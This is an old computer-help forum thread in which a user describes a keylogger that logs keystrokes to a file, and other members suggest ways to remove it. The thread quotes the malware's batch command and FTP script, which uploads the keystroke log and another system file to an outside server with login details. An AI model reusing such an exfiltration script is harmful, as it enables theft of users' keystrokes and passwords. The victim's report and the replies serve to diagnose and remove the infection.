| Forum Home | ||||
| Press F1 | ||||
| Thread ID: 48885 | 2004-09-04 00:50:00 | Spy FTP Program | dave_r (6118) | Press F1 |
| Post ID | Timestamp | Content | User | ||
| 269058 | 2004-09-04 00:50:00 | I am wondering if anyone has run across this before? While surfing I periodically get ftp.exe trying to access the net. It appears I have a virus or spyware but neither Norton, Spybot or PestPatrol have found it. It works like this: A file in C:\ called net.cfg logs keystrokes, then a batch file called ton.bat is created with the following contents: "ftp.exe -s:lap.txt" The contents of lap.txt are: "open kolyan.netfirms.com kolyan vc63ks cd www cd jsmx mkdir gepe cd gepe binary put c:\net.cfg put c:\msdos_.sys bye" The site referred to has been taken down and I have tried ftping the site but the password has changed. I have created a read only version of net.cfg so no keystrokes can be logged but, as I cannot find the virus and there does not seem to anything in startup, I am at a loss as how to remove it. Any ideas out there? |
dave_r (6118) | ||
| 269059 | 2004-09-04 01:12:00 | do a file scan for ftp.exe then when/if you find it rename it.......if you cant rename it then do it in safe mode | drcspy (146) | ||
| 269060 | 2004-09-04 03:44:00 | The dirty work is probably being done before Windows starts.:D I would suspect c:\msdos_sys, which is also supposed to be sent to the foreign site by that script. Have a look at c:\config.sys and c:\autoexec.bat, too, just in case. |
Graham L (2) | ||
| 269061 | 2004-09-04 04:07:00 | If this virus is disabling your anti-virus then try an online scan. Trend Micro (http://housecall.trendmicro.com/) offer one. | Greg S (201) | ||
| 1 | |||||